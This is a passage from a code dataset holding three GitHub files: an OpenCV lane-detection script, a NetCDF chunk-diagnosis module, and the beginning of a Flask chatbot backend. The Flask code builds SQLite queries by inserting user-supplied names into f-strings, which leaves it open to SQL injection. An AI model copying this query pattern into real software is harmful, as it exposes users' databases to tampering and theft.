right_lane_inds = []\n \n lx, ly, rx, ry = [], [], [], []\n\n\n for window in range(nwindows):\n\n win_yl = lane.shape[0] - (window+1)*window_height\n win_yh = lane.shape[0] - window*window_height\n\n win_xll = leftx_current - margin\n win_xlh = leftx_current + margin\n win_xrl = rightx_current - margin\n win_xrh = rightx_current + margin\n\n cv2.rectangle(img,(win_xll,win_yl),(win_xlh,win_yh),(0,255,0), 2) \n cv2.rectangle(img,(win_xrl,win_yl),(win_xrh,win_yh),(0,255,0), 2) \n\n good_left_inds = ((nz[0] >= win_yl)&(nz[0] < win_yh)&(nz[1] >= win_xll)&(nz[1] < win_xlh)).nonzero()[0]\n good_right_inds = ((nz[0] >= win_yl)&(nz[0] < win_yh)&(nz[1] >= win_xrl)&(nz[1] < win_xrh)).nonzero()[0]\n\n left_lane_inds.append(good_left_inds)\n right_lane_inds.append(good_right_inds)\n\n if 
len(good_left_inds) > minpix:\n leftx_current = np.int(np.mean(nz[1][good_left_inds]))\n if len(good_right_inds) > minpix: \n rightx_current = np.int(np.mean(nz[1][good_right_inds]))\n\n lx.append(leftx_current)\n ly.append((win_yl + win_yh)/2)\n\n rx.append(rightx_current)\n ry.append((win_yl + win_yh)/2)\n\n left_lane_inds = np.concatenate(left_lane_inds)\n right_lane_inds = np.concatenate(right_lane_inds)\n\n\n \n lfit = np.polyfit(np.array(ly),np.array(lx),2)\n rfit = np.polyfit(np.array(ry),np.array(rx),2)\n\n img[nz[0][left_lane_inds], nz[1][left_lane_inds]] = [255, 0, 0]\n img[nz[0][right_lane_inds] , nz[1][right_lane_inds]] = [0, 0, 255]\n\n if count % 30 == 0:\n line_temp[0].append(leftx_current * 2) \n line_temp[1].append(rightx_current * 2) \n\n cv2.imshow(\"cam\", img)\n cv2.imshow(\"blur_gray\", blur_gray)\n cv2.imshow(\"reverse\", reverse)\n\n return lfit, rfit\n\ndef draw_lane(image, warp_img, Minv, left_fit, right_fit):\n global Width, Height\n yMax = warp_img.shape[0]\n ploty = np.linspace(0, yMax - 1, yMax)\n color_warp = np.zeros_like(warp_img).astype(np.uint8)\n \n left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]\n right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]\n \n pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])\n pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))]) \n pts = np.hstack((pts_left, pts_right))\n \n color_warp = cv2.fillPoly(color_warp, np.int_([pts]), (0, 255, 0))\n newwarp = cv2.warpPerspective(color_warp, Minv, (Width, Height))\n\n return cv2.addWeighted(image, 1, newwarp, 0.3, 0)\n\ncount = 0\ndef start():\n global Width, Height, cap, count\n\n _, frame = cap.read()\n while not frame.size == (Width*Height*3):\n _, frame = cap.read()\n continue\n\n print(\"start\")\n\n while cap.isOpened():\n count += 1\n \n _, frame = cap.read()\n if frame is None:\n print('--(!) 
No captured frame -- Break!')\n # close the video file pointers\n line=pd.DataFrame(line_temp)\n line=line.transpose()\n line.to_csv('../line.csv',header=False, index=False)\n cap.release()\n break\n\n\n image = frame\n warp_img, M, Minv = warp_image(image, warp_src, warp_dist, (warp_img_w, warp_img_h))\n left_fit, right_fit = warp_process_image(warp_img)\n lane_img = draw_lane(image, warp_img, Minv, left_fit, right_fit)\n cv2.circle(lane_img, (100,340),5, (0,0,255), -1)\n cv2.circle(lane_img, (0,413),5, (0,255,0), -1)\n cv2.circle(lane_img, (540,340),5, (255,0,0), -1)\n cv2.circle(lane_img, (640,413),5, (0,255,255), -1)\n\n cv2.circle(lane_img, (pre_leftx_current*2, 400),5, (255,0,255), -1)\n cv2.circle(lane_img, (pre_rightx_current*2, 400),5, (255,0,255), -1)\n\n cv2.line(lane_img, (midpoint*2,0), (midpoint*2, 480), (255,255,255),2)\n \n cv2.imshow(window_title, lane_img)\n cv2.waitKey(1)\n\n\nif __name__ == '__main__':\n start()\n", "repo_name": "BreathIN423/lane_detection", "sub_path": "sliding_find_jh.py", "file_name": "sliding_find_jh.py", "file_ext": "py", "file_size_in_byte": 6832, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cv2.VideoCapture", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 34, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 41, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.getOptimalNewCameraMatrix", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.undistort", "line_number": 58, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 62, "usage_type": "call"}, {"api_name": "cv2.getPerspectiveTransform", "line_number": 66, "usage_type": "call"}, {"api_name": "cv2.getPerspectiveTransform", "line_number": 67, "usage_type": "call"}, {"api_name": "cv2.warpPerspective", "line_number": 68, "usage_type": "call"}, {"api_name": "cv2.INTER_LINEAR", "line_number": 68, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 90, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 90, "usage_type": "attribute"}, {"api_name": "cv2.mean", "line_number": 92, "usage_type": "call"}, {"api_name": "cv2.add", "line_number": 94, "usage_type": "call"}, {"api_name": "cv2.GaussianBlur", "line_number": 96, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 99, "usage_type": "call"}, {"api_name": "audioop.reverse", "line_number": 103, "usage_type": "name"}, {"api_name": "cv2.threshold", "line_number": 103, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 103, "usage_type": "attribute"}, {"api_name": "audioop.reverse", "line_number": 104, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 129, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 148, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.mean", 
"line_number": 158, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 174, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 183, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 184, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 185, "usage_type": "call"}, {"api_name": "audioop.reverse", "line_number": 185, "usage_type": "argument"}, {"api_name": "numpy.linspace", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 193, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 200, "usage_type": "call"}, {"api_name": "cv2.fillPoly", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.int_", "line_number": 202, "usage_type": "call"}, {"api_name": "cv2.warpPerspective", "line_number": 203, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 205, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 225, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 236, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 237, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 238, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 239, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 241, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 242, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 244, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 246, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 247, "usage_type": "call"}]}
+{"seq_id": "39173725539", "text": "from loguru import logger\nimport os\nfrom netCDF4 import Dataset\nimport pandas as pd\nimport numpy as np\nimport xarray as xr\nfrom typing import Annotated\nfrom typing import List\nfrom pathlib import Path\nfrom concurrent.futures import ProcessPoolExecutor\nfrom concurrent.futures import as_completed\nfrom rich import print\nimport typer\nfrom .typer_parameters import OrderCommands\nfrom .typer_parameters import typer_argument_source_directory\nfrom .typer_parameters import typer_option_filename_pattern\nfrom .typer_parameters import typer_argument_longitude_in_degrees\nfrom .typer_parameters import typer_argument_latitude_in_degrees\nfrom .typer_parameters import typer_option_csv\nfrom .typer_parameters import typer_option_verbose\nfrom .models import XarrayVariableSet\nfrom .models import select_xarray_variable_set_from_dataset\nfrom .models import select_netcdf_variable_set_from_dataset\nfrom .constants import VERBOSE_LEVEL_DEFAULT\nfrom .constants import NOT_AVAILABLE\nfrom .progress import DisplayMode\nfrom .progress import display_context\nfrom .print import print_chunk_shapes_table\nfrom .print import print_common_chunk_layouts\nfrom .select import select_fast\nfrom .csv import write_nested_dictionary_to_csv\n# from .rich_help_panel_names import rich_help_panel_diagnose\n\n\ndef format_compression(compression_dict):\n if isinstance(compression_dict, dict):\n # Keep only keys with True values\n return ', '.join([key for key, value in compression_dict.items() if value])\n return compression_dict\n\n\ndef get_netcdf_metadata(\n input_netcdf_path: Path,\n variable: str = None,\n variable_set: Annotated[XarrayVariableSet, typer.Option(help=\"Set of Xarray variables to diagnose\")] = XarrayVariableSet.all,\n longitude: Annotated[float, typer_argument_longitude_in_degrees] = 8,\n latitude: Annotated[float, typer_argument_latitude_in_degrees] = 45,\n csv: Annotated[Path, typer_option_csv] = None,\n verbose: Annotated[int, typer_option_verbose] = VERBOSE_LEVEL_DEFAULT,\n):\n \"\"\"\n \"\"\"\n if not os.path.exists(input_netcdf_path):\n return \"File not found: \" + input_netcdf_path\n\n with Dataset(input_netcdf_path, 'r') as dataset:\n metadata = {\n \"File name\": input_netcdf_path.name,\n \"File size\": os.path.getsize(input_netcdf_path), # in Bytes\n \"Dimensions\": {\n dim: len(dataset.dimensions[dim]) for dim in dataset.dimensions\n },\n }\n selected_variables = select_netcdf_variable_set_from_dataset(\n XarrayVariableSet, variable_set, dataset\n )\n data_variables = select_netcdf_variable_set_from_dataset(\n XarrayVariableSet, 'data', dataset\n )\n variables_metadata = {}\n for variable_name in selected_variables:\n variable = dataset[variable_name] # variable is not a simple string anymore!\n variable_metadata = {\n 'Shape': ' x '.join(map(str, variable.shape)),\n 'Chunks': ' x '.join(map(str, variable.chunking())),\n 'Cache*': ' x '.join(map(str, variable.get_var_chunk_cache())),\n 'Type': str(variable.dtype),\n 'Scale': getattr(variable, 'scale_factor', NOT_AVAILABLE),\n 'Offset': getattr(variable, 'add_offset', NOT_AVAILABLE),\n 'Compression': variable.filters() if 'filters' in dir(variable) else NOT_AVAILABLE,\n 'Shuffling': getattr(variable, 'shuffle', NOT_AVAILABLE),\n 'Read time': NOT_AVAILABLE,\n }\n variables_metadata[variable_name] = variable_metadata # Add info to variable_metadata\n if variable_name in data_variables:\n data_retrieval_time = select_fast(\n time_series=input_netcdf_path,\n variable=variable_name,\n 
longitude=longitude,\n latitude=latitude,\n )\n else:\n data_retrieval_time = NOT_AVAILABLE\n variables_metadata[variable_name]['Read time'] = data_retrieval_time\n\n metadata['Variables'] = variables_metadata\n\n if verbose:\n from .print import print_metadata_table\n print_metadata_table(metadata)\n\n return metadata, input_netcdf_path\n\n\ndef get_multiple_netcdf_metadata(\n file_paths: List[Path],\n variable: str = None,\n variable_set: XarrayVariableSet = XarrayVariableSet.all,\n csv: Path = None,\n verbose: int = VERBOSE_LEVEL_DEFAULT,\n):\n \"\"\"\n \"\"\"\n metadata_series = {}\n with ProcessPoolExecutor() as executor:\n futures = [\n executor.submit(\n get_netcdf_metadata,\n file_path,\n variable,\n variable_set.value,\n )\n for file_path in file_paths\n ]\n for future in as_completed(futures):\n try:\n metadata, input_netcdf_path = future.result()\n # logger.info(f'Metadata : {metadata}')\n metadata_series[input_netcdf_path.name] = metadata\n except Exception as e:\n logger.error(f\"Error processing file: {e}\")\n\n return metadata_series\n\n\nfrom typing import Optional\ndef collect_netcdf_metadata(\n source_directory: Annotated[Path, typer_argument_source_directory],\n pattern: Annotated[str, typer_option_filename_pattern] = \"*.nc\",\n variable_set: Annotated[XarrayVariableSet, typer.Option(help=\"Set of Xarray variables to diagnose\")] = XarrayVariableSet.all,\n long_table: Annotated[Optional[bool], 'Group rows of metadata per input NetCDF file and variable in a long table'] = False,\n group_metadata: Annotated[Optional[bool], 'Visually cluster rows of metadata per input NetCDF file and variable'] = False,\n csv: Annotated[Path, typer_option_csv] = None,\n verbose: Annotated[int, typer_option_verbose] = VERBOSE_LEVEL_DEFAULT,\n):\n \"\"\"Scan files in the source directory that match the pattern and diagnose the chunking shapes for each variable.\"\"\"\n source_directory = Path(source_directory)\n file_paths = list(source_directory.glob(pattern))\n mode = DisplayMode(verbose)\n with display_context[mode]:\n try:\n metadata_series = get_multiple_netcdf_metadata(\n file_paths=file_paths,\n variable_set=variable_set,\n )\n except TypeError as e:\n raise ValueError(\"Error occurred:\", e)\n\n if not long_table:\n from .print import print_metadata_series_table\n print_metadata_series_table(\n metadata_series=metadata_series,\n group_metadata=group_metadata,\n )\n else:\n from .print import print_metadata_series_long_table\n print_metadata_series_long_table(\n metadata_series=metadata_series,\n group_metadata=group_metadata,\n )\n\n if csv:\n write_nested_dictionary_to_csv(\n nested_dictionary=metadata_series,\n output_filename=csv,\n )\n\n\ndef detect_chunking_shapes(\n file_path: Path,\n variable_set: XarrayVariableSet = XarrayVariableSet.all,\n):\n \"\"\"Scan a single NetCDF file for chunking shapes per variable\"\"\"\n chunking_shapes = {}\n with xr.open_dataset(file_path, engine=\"netcdf4\") as dataset:\n selected_variables = select_xarray_variable_set_from_dataset(\n XarrayVariableSet, variable_set, dataset\n )\n for variable in selected_variables:\n chunking_shape = dataset[variable].encoding.get(\"chunksizes\")\n if chunking_shape and chunking_shape != \"contiguous\":\n chunking_shapes[variable] = chunking_shape\n\n return chunking_shapes, file_path.name\n\n\ndef detect_chunking_shapes_parallel(\n file_paths: List[Path],\n variable_set: XarrayVariableSet = XarrayVariableSet.all,\n):\n \"\"\"\n Detect and aggregate the chunking shapes of variables within a set of NetCDF files 
in parallel.\n\n Parameters\n ----------\n file_paths : list of Path\n A list of file paths pointing to the NetCDF files to be scanned.\n\n Returns\n -------\n dict\n A nested dictionary where the first level keys are variable names, and the\n second level keys are the chunking shapes encountered, with the associated\n values being sets of file names where those chunking shapes are found.\n \"\"\"\n aggregated_chunking_shapes = {}\n with ProcessPoolExecutor() as executor:\n futures = [\n executor.submit(detect_chunking_shapes, file_path, variable_set.value)\n for file_path in file_paths\n ]\n\n for future in as_completed(futures):\n try:\n chunking_shapes, file_name = future.result()\n # logger.info(f\"Scanned file: {file_name}\")\n\n for variable, chunking_shape in chunking_shapes.items():\n if variable not in aggregated_chunking_shapes:\n aggregated_chunking_shapes[variable] = {}\n # logger.info(\n # f\"Initial chunk sizes set for {variable} in {file_name}\"\n # )\n if chunking_shape not in aggregated_chunking_shapes[variable]:\n aggregated_chunking_shapes[variable][chunking_shape] = set()\n # logger.info(\n # f\"New chunking shape {chunking_shape} found for variable {variable} in {file_name}\"\n # )\n aggregated_chunking_shapes[variable][chunking_shape].add(file_name)\n\n except Exception as e:\n logger.error(f\"Error processing file: {e}\")\n\n return aggregated_chunking_shapes\n\n\n# app = typer.Typer(\n# cls=OrderCommands,\n# add_completion=True,\n# add_help_option=True,\n# rich_markup_mode=\"rich\",\n# help=f'Create kerchunk reference',\n# )\n\n\n# @app.command(\n# 'shapes',\n# no_args_is_help=True,\n# help='Diagnose chunking shapes along series of files in a format supported by Xarray',\n# rich_help_panel=rich_help_panel_diagnose,\n# )\ndef diagnose_chunking_shapes(\n source_directory: Annotated[Path, typer_argument_source_directory],\n pattern: Annotated[str, typer_option_filename_pattern] = \"*.nc\",\n variable_set: Annotated[XarrayVariableSet, typer.Option(help=\"Set of Xarray variables to diagnose\")] = XarrayVariableSet.all,\n csv: Annotated[Path, typer_option_csv] = None,\n verbose: Annotated[int, typer_option_verbose] = VERBOSE_LEVEL_DEFAULT,\n):\n \"\"\"Scan files in the source directory that match the pattern and diagnose the chunking shapes for each variable.\"\"\"\n source_directory = Path(source_directory)\n file_paths = list(source_directory.glob(pattern))\n mode = DisplayMode(verbose)\n with display_context[mode]:\n try:\n chunking_shapes = detect_chunking_shapes_parallel(\n file_paths=file_paths,\n variable_set=variable_set,\n )\n except TypeError as e:\n raise ValueError(\"Error occurred:\", e)\n print_chunk_shapes_table(chunking_shapes)#, highlight_variables) : Idea\n\n if csv:\n write_nested_dictionary_to_csv(\n nested_dictionary=chunking_shapes,\n output_filename=csv,\n )\n\n\n# @app.command(\n# 'common-shape',\n# no_args_is_help=True,\n# help='Determine common chunking shape in multiple NetCDF files',\n# rich_help_panel=rich_help_panel_diagnose,\n# )\ndef determine_common_chunking_layout(\n source_directory: Annotated[Path, typer_argument_source_directory],\n pattern: Annotated[str, typer_option_filename_pattern] = \"*.nc\",\n variable_set: Annotated[XarrayVariableSet, typer.Option(help=\"Set of Xarray variables to diagnose\")] = XarrayVariableSet.all,\n verbose: Annotated[int, typer_option_verbose] = VERBOSE_LEVEL_DEFAULT,\n):\n \"\"\"\n \"\"\"\n source_directory = Path(source_directory)\n if not source_directory.exists() or not 
any(source_directory.iterdir()):\n print(f\"[red]The directory [code]{source_directory}[/code] does not exist or is empty[/red].\")\n return\n file_paths = list(source_directory.glob(pattern))\n if not file_paths:\n print(f\"No files matching the pattern [code]{pattern}[/code] found in [code]{source_directory}[/code]!\")\n return\n\n mode = DisplayMode(verbose)\n with display_context[mode]:\n chunking_shapes = detect_chunking_shapes_parallel(\n file_paths=file_paths,\n variable_set=variable_set,\n )\n common_chunking_shapes = {}\n for variable, shapes in chunking_shapes.items():\n import numpy as np\n max_shape = np.array(next(iter(shapes)), dtype=int)\n for shape in shapes:\n current_shape = np.array(shape, dtype=int)\n max_shape = np.maximum(max_shape, current_shape)\n common_chunking_shapes[variable] = tuple(max_shape)\n\n print_common_chunk_layouts(common_chunking_shapes)\n return common_chunking_shapes\n", "repo_name": "NikosAlexandris/rekx", "sub_path": "rekx/diagnose.py", "file_name": "diagnose.py", "file_ext": "py", "file_size_in_byte": 13073, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pathlib.Path", "line_number": 43, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 45, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet", "line_number": 45, "usage_type": "name"}, {"api_name": "typer.Option", "line_number": 45, "usage_type": "call"}, {"api_name": "typing.Annotated", "line_number": 46, "usage_type": "name"}, {"api_name": "typer_parameters.typer_argument_longitude_in_degrees", "line_number": 46, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 47, "usage_type": "name"}, {"api_name": "typer_parameters.typer_argument_latitude_in_degrees", "line_number": 47, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 48, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 48, "usage_type": "name"}, {"api_name": "typer_parameters.typer_option_csv", "line_number": 48, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 49, "usage_type": "name"}, {"api_name": "typer_parameters.typer_option_verbose", "line_number": 49, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet.all", "line_number": 45, "usage_type": "attribute"}, {"api_name": "constants.VERBOSE_LEVEL_DEFAULT", "line_number": 49, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "netCDF4.Dataset", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.getsize", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "models.select_netcdf_variable_set_from_dataset", "line_number": 64, "usage_type": "call"}, {"api_name": "models.XarrayVariableSet", "line_number": 65, "usage_type": "argument"}, {"api_name": "models.select_netcdf_variable_set_from_dataset", "line_number": 67, "usage_type": "call"}, {"api_name": "models.XarrayVariableSet", "line_number": 68, "usage_type": "argument"}, {"api_name": "constants.NOT_AVAILABLE", "line_number": 78, "usage_type": "argument"}, {"api_name": "constants.NOT_AVAILABLE", "line_number": 79, "usage_type": "argument"}, {"api_name": "constants.NOT_AVAILABLE", "line_number": 80, "usage_type": "name"}, {"api_name": "constants.NOT_AVAILABLE", "line_number": 81, "usage_type": "argument"}, {"api_name": 
"constants.NOT_AVAILABLE", "line_number": 82, "usage_type": "name"}, {"api_name": "select.select_fast", "line_number": 86, "usage_type": "call"}, {"api_name": "constants.NOT_AVAILABLE", "line_number": 93, "usage_type": "name"}, {"api_name": "print.print_metadata_table", "line_number": 100, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 106, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 106, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet", "line_number": 108, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 109, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet.all", "line_number": 108, "usage_type": "attribute"}, {"api_name": "constants.VERBOSE_LEVEL_DEFAULT", "line_number": 110, "usage_type": "name"}, {"api_name": "concurrent.futures.ProcessPoolExecutor", "line_number": 115, "usage_type": "call"}, {"api_name": "concurrent.futures.as_completed", "line_number": 125, "usage_type": "call"}, {"api_name": "loguru.logger.error", "line_number": 131, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 131, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 138, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 138, "usage_type": "name"}, {"api_name": "typer_parameters.typer_argument_source_directory", "line_number": 138, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 139, "usage_type": "name"}, {"api_name": "typer_parameters.typer_option_filename_pattern", "line_number": 139, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 140, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet", "line_number": 140, "usage_type": "name"}, {"api_name": "typer.Option", "line_number": 140, "usage_type": "call"}, {"api_name": "typing.Annotated", "line_number": 141, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 141, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 142, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 142, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 143, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 143, "usage_type": "name"}, {"api_name": "typer_parameters.typer_option_csv", "line_number": 143, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 144, "usage_type": "name"}, {"api_name": "typer_parameters.typer_option_verbose", "line_number": 144, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet.all", "line_number": 140, "usage_type": "attribute"}, {"api_name": "constants.VERBOSE_LEVEL_DEFAULT", "line_number": 144, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 147, "usage_type": "call"}, {"api_name": "progress.DisplayMode", "line_number": 149, "usage_type": "call"}, {"api_name": "progress.display_context", "line_number": 150, "usage_type": "name"}, {"api_name": "print.print_metadata_series_table", "line_number": 161, "usage_type": "call"}, {"api_name": "print.print_metadata_series_long_table", "line_number": 167, "usage_type": "call"}, {"api_name": "csv.write_nested_dictionary_to_csv", "line_number": 173, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 180, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet", "line_number": 181, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet.all", "line_number": 181, "usage_type": "attribute"}, {"api_name": "xarray.open_dataset", "line_number": 185, "usage_type": 
"call"}, {"api_name": "models.select_xarray_variable_set_from_dataset", "line_number": 186, "usage_type": "call"}, {"api_name": "models.XarrayVariableSet", "line_number": 187, "usage_type": "argument"}, {"api_name": "typing.List", "line_number": 198, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 198, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet", "line_number": 199, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet.all", "line_number": 199, "usage_type": "attribute"}, {"api_name": "concurrent.futures.ProcessPoolExecutor", "line_number": 217, "usage_type": "call"}, {"api_name": "concurrent.futures.as_completed", "line_number": 223, "usage_type": "call"}, {"api_name": "loguru.logger.error", "line_number": 242, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 242, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 263, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 263, "usage_type": "name"}, {"api_name": "typer_parameters.typer_argument_source_directory", "line_number": 263, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 264, "usage_type": "name"}, {"api_name": "typer_parameters.typer_option_filename_pattern", "line_number": 264, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 265, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet", "line_number": 265, "usage_type": "name"}, {"api_name": "typer.Option", "line_number": 265, "usage_type": "call"}, {"api_name": "typing.Annotated", "line_number": 266, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 266, "usage_type": "name"}, {"api_name": "typer_parameters.typer_option_csv", "line_number": 266, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 267, "usage_type": "name"}, {"api_name": "typer_parameters.typer_option_verbose", "line_number": 267, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet.all", "line_number": 265, "usage_type": "attribute"}, {"api_name": "constants.VERBOSE_LEVEL_DEFAULT", "line_number": 267, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 270, "usage_type": "call"}, {"api_name": "progress.DisplayMode", "line_number": 272, "usage_type": "call"}, {"api_name": "progress.display_context", "line_number": 273, "usage_type": "name"}, {"api_name": "print.print_chunk_shapes_table", "line_number": 281, "usage_type": "call"}, {"api_name": "csv.write_nested_dictionary_to_csv", "line_number": 284, "usage_type": "call"}, {"api_name": "typing.Annotated", "line_number": 297, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 297, "usage_type": "name"}, {"api_name": "typer_parameters.typer_argument_source_directory", "line_number": 297, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 298, "usage_type": "name"}, {"api_name": "typer_parameters.typer_option_filename_pattern", "line_number": 298, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 299, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet", "line_number": 299, "usage_type": "name"}, {"api_name": "typer.Option", "line_number": 299, "usage_type": "call"}, {"api_name": "typing.Annotated", "line_number": 300, "usage_type": "name"}, {"api_name": "typer_parameters.typer_option_verbose", "line_number": 300, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet.all", "line_number": 299, "usage_type": "attribute"}, {"api_name": "constants.VERBOSE_LEVEL_DEFAULT", "line_number": 
300, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 304, "usage_type": "call"}, {"api_name": "rich.print", "line_number": 306, "usage_type": "call"}, {"api_name": "rich.print", "line_number": 310, "usage_type": "call"}, {"api_name": "progress.DisplayMode", "line_number": 313, "usage_type": "call"}, {"api_name": "progress.display_context", "line_number": 314, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 324, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 325, "usage_type": "call"}, {"api_name": "print.print_common_chunk_layouts", "line_number": 328, "usage_type": "call"}]}
+{"seq_id": "13661507303", "text": "import json\nfrom flask import Flask, request, render_template, redirect, url_for, jsonify\nimport requests\nfrom flask_cors import CORS\nimport string\nimport sqlite3\nimport uuid\nimport time\nimport datetime\nimport re\n\n\napp = Flask(__name__)\nCORS(app)\n\n\nuser = {\n \"name\": None,\n \"is_todo\": False,\n 'askCreate': False,\n}\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\", user_name=user['name'])\n\n\ndef checkIfUserIsInDB(userName):\n connection = sqlite3.connect('botoBrain.db')\n curs = connection.cursor()\n curs.execute(f\"SELECT * FROM users WHERE name = '{userName}' LIMIT 1\")\n res = curs.fetchone()\n if res:\n user['id'] = res[0]\n return f\"Good to see you again, {res[1]}\"\n else:\n user['id'] = uuid.uuid1()\n curs.execute(\n f\"INSERT INTO users VALUES ('{user['id']}' , '{userName}' )\")\n connection.commit()\n return f\"Welcome {user['name']}\"\n\n\ndef createNewTask(user_message):\n connection = sqlite3.connect('botoBrain.db')\n task_id = uuid.uuid1()\n curs = connection.cursor()\n curs.execute(\n f\"INSERT INTO tasks VALUES 